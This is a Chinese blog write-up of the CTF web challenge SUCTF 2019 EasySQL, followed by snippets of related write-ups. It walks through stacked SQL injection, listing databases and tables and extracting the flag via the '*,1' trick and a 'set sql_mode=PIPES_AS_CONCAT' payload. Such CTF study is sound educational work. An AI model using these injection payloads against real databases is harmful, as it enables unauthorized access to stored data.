SUCTF-2019-EasySQL

最新推荐文章于 2025-07-29 11:18:50 发布
原创 最新推荐文章于 2025-07-29 11:18:50 发布 · 4k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #安全 #web安全

本文介绍了一种特定场景下的SQL注入攻击方法,通过堆叠注入绕过常规防御,并展示了如何利用特殊配置读取敏感数据。

看一下源代码

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>

Array
(
    [0] => 1
)

通过post请求

在这里插入图片描述

输一个非零数字有回显,输一个字母无回显

在这里插入图片描述

输入1'无回显,证明含有sql注入但无错误回显

在这里插入图片描述

反复尝试了一下,可以堆叠注入

1;show databases; 查库
1;show tables;查表

在这里插入图片描述

在这里插入图片描述

发现有一个flag表

网上搜了一下 比赛的时候后面给了select

select $_GET['query'] || flag from flag

*没有被过滤掉

试一下*,1select *,1||flag from flag
即变成了 select *,1 from flag

就可以查出表的内容了

在这里插入图片描述

或者是之前有提到可以进行堆叠注入

关键的查询代码是 select $post['query']||flag from Flag

要想办法让 ||不是逻辑或
官方给的 payload 是1;set sql_mode=PIPES_AS_CONCAT;select 1

拼接一下就是select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag

sql_mode是一组语法校验规则

sql_mode相关链接

⑨PIPES_AS_CONCAT
将"||"视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样是,也和字符串的拼接函数Concat类似

则将sql_mode设置为PIPES_AS_CONCAT

使用||相当于是将 select 1select flag from flag 的结果拼接在一起

即通过1;来结束上一sql语句然后将sql_mode设置为PIPES_AS_CONCAT,最后将select 1select flag from flag 的结果拼接在一起

在这里插入图片描述

总结

本关运用到的注入方法为堆叠注入

关于堆叠注入union联合注入

分号;表示一条SQL语句的结束.如果在;结束后继续写入下一条语句,会一起执行。这个就是堆叠注入。

联合注入也是将两条语句合并在一起

union联合注入执行的语句类型有限,只能用来执行查询语句,但堆叠注入不同,可以执行任意类型的语句。

比如本题中的:select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag

参考

https://blog.youkuaiyun.com/qq_45552960/article/details/104185620

buuctf easysql 1
weixin_61060664的博客
09-14 596
ctf的练习1
[初级]sql注入之堆叠注入、运算符干扰[SUCTF 2019]EasySQL1
BlingZeng的博客
02-11 778
一道buuctf的题目 [SUCTF 2019]EasySQL1 并不难,主要靠猜。
BUUCTF WEB EasySQL 两个
m0_46315342的博客
08-21 642
BUUCTF WEB EasySQL 进去后看到的页面是: 然后由于这个题目提示SQL注入,先试试 1 1' 1" 1'# 1"# 发现上面几种都得到了一个空白页面,所以好像就不能再继续构造其他的语句了。但是这个符合堆栈注入的特征。试一下1;show databases; 结果就把所有的数据库爆出来了,接下来试试1;show tables; 然后尝试报数据,`1;select * from Flag; 发现不行,应该是过滤了,所以我看了一下别人的WP,直接到GITHUB上下载源码, <?ph
BUUCTF [SUCTF 2019] EasySQL
Senimo
03-30 2438
BUUCTF [SUCTF 2019] EasySQL Web writeup 启动靶机,打开页面: 根据题目判断是SQL注入,判断注入类型: 1;show databases; 最终判断为堆叠注入,查看当前表名: 1;show tables; 得到当前表名为Flag,多次注入无果,查看writeup存在源码泄露:index.php.swp,本环境无泄露 <?php se...
记buuctf 0x01
qq_43871200的博客
03-13 3076
接上一个关于buuoj上的题解,确实题很多,慢慢刷吧 [SUCTF 2019]EasySQL 唉,大佬做题都是习惯在题目上标上Easy,本菜鸡已无力吐槽(自己菜还能怪谁。。。) Give me your flag, I will tell you if the flag is right. 输入框 只有一个输入框,输入查询的东西,只有三种回显,一个是数组,一个是Nonono,一个是返回空,猜测...
[SUCTF 2019]EasySQL
single7_的博客
12-14 296
0x01 思路 根据题目名称判断为 SQL 注入 测试’ or ‘1’='1 发现存在waf。 考虑进行堆叠注入 query=1;select database();# Array ( [0] => 1 ) Array ( [0] => ctf ) query=1;use ctf;show tables;# Array ( [0] => 1 ) Array ( [0] => Flag ) 0x02 flag 使用*,1放入查询语句,即可获得 f
BUUCTF[SUCTF 2019]EasySQL
楼阁de猫的博客
09-25 603
利用原理: (1)补充系统变量@@sql_modesql_mode:是一组mysql支持的基本语法及校验规则 PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似 猜测后台sql语句为: select 接受的变量 || flag form flag; payload: 1;set sql_mode=pipes_as_contact;select1; //闭合 //设置变量
buuctf-[SUCTF 2019]EasySQL题解
2301_81574836的博客
02-19 648
buuctf-[SUCTF 2019]EasySQL题解
[SUCTF 2019]EasySQL 1
ZZHow Blog
07-29 1450
摘要 本文详细记录了[SUCTF 2019]EasySQL 1题目的解题过程。通过分析题目界面和尝试基本注入方法,发现传统SQL注入被过滤。转而使用堆叠注入技术,成功获取数据库和表名(发现Flag表)。推测后端查询逻辑为"select 输入||flag from Flag",最终通过两种方法获取flag:1)输入"*,1"构造查询语句;2)修改sql_mode将||转为字符串连接。 写于2023/11/28
buuctf-web-[SUCTF 2019]EasySQL 1-wp
居上
06-22 1189
[SUCTF 2019]EasySQL 源码 网上找的源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLink = mysqli_connect("localhost",$datauser,$datapass); if(!$MysqlL
BUUCTF [SUCTF 2019]EasySQL1 writeup
2401_83237906的博客
10-25 1346
很简单的,但是注入条件十分有限,只有调用数据库的函数支持执行多条语句才能够使用,mysqli_multi_query()函数,大多开发人员不会用这个,往往开发用的是mysqli_query函数,只执行一条语句;然后我就想执行select * from Flag嘛,em,可是fuzz得到from关键字是被挡的;实现select *,1 from Flag执行,select **** from Flag不执行。相当于是select 1 from Flag和select flag from Flag
buuctf web [SUCTF 2019]EasySQL详细讲解
qq_61988806的博客
10-27 1766
buuctf web [SUCTF 2019]EasySQL详细讲解
SUCTF部分web题解
迷风小白
08-28 3635
CheckIn 题目打开就是一个上传点 经过初步测试发现可以上传jpg、png、htaccess等文件,用exif_image函数来判断上传文件头,限制了php文件且文件内容里不能包含<?,,但可以上传<script language='php'><scirpt>类型的图片马来绕过。 尝试上传htaccess文件,发现无效,因为利用htaccess需要有两个...
[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)
笑花大王
02-09 971
简介 原题复现: 1 <?php 2 session_start(); 3 4 include_once "config.php"; 5 6 $post = array(); 7 $get = array(); 8 global $MysqlLink; 9 10 //GetPara(); 11 $...
web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
热门推荐
CJB6988125的博客
11-19 1万+
web做题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
BUUCTF刷题记录
bmth666的博客
03-15 2467
文章目录web[强网杯 2019]随便注[护网杯 2018]easy_tornado web [强网杯 2019]随便注 注意表的两端两边要加:`` 1' ; show databases;#查看数据库 1' ;show tables;#查看表 0'; show columns from words ;#查看words表中字段 0';show columns from 19198109311...
你猜猜
u012368968的专栏
11-18 940
/* * 程序的版权和版本声明部分: * Copyright (c) 2013, 烟台大学计算机学院 * All rights reserved. * 文件名称:test.cpp * 作 者:周经纬 * 完成日期:2013年 11月 18日 *版 本 号:v12.1 * 猜数: * 输入描述:无 * 问题描述:。 * 程序输出: * 问题分析:略 * 算法设计:略
BUUCTF__[极客大挑战 2019]Http_题解
风过江南乱的博客
06-21 7974
前言 在35°C的夏天,停了一天的电,晚上才来电,已经ye死 又是一题基础水题。 题目 首先打开是挺好看的一个前端页面。介绍了一个安全技术小组。 做题第一步,当然是F12大法。 于是发现Secret.php ,先访问,提示你不是来自https://www.Sycsecret.com 当然,题目是http ,http有一个知识点就是HTTP报文 header ,有请求头和响应头。也就是一些协议内容。 ...
SUCTF2019-EasySQL
wyj_1216 House
02-08 538
题目 writeup 尝试输入:1 尝试众多后发现有三种返回值: 正常回显 nonono 空白 考虑到前面做过的题,堆叠注入 上网查看各位大佬的文章,找到了源码: <?php session_start(); include_once "config.php"; $post = array(); $get = array(); globa...
SUCTF 2019EasySQL 1
最新发布
08-16
SUCTF 2019 比赛中,`EasySQL` 是一道与 SQL 注入相关的 CTF 题目,通常涉及对 SQL 注入漏洞的识别和利用。该题目可能设计为让参赛者通过构造特定的 SQL 查询语句来绕过验证逻辑,从而获取数据库中的敏感信息,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值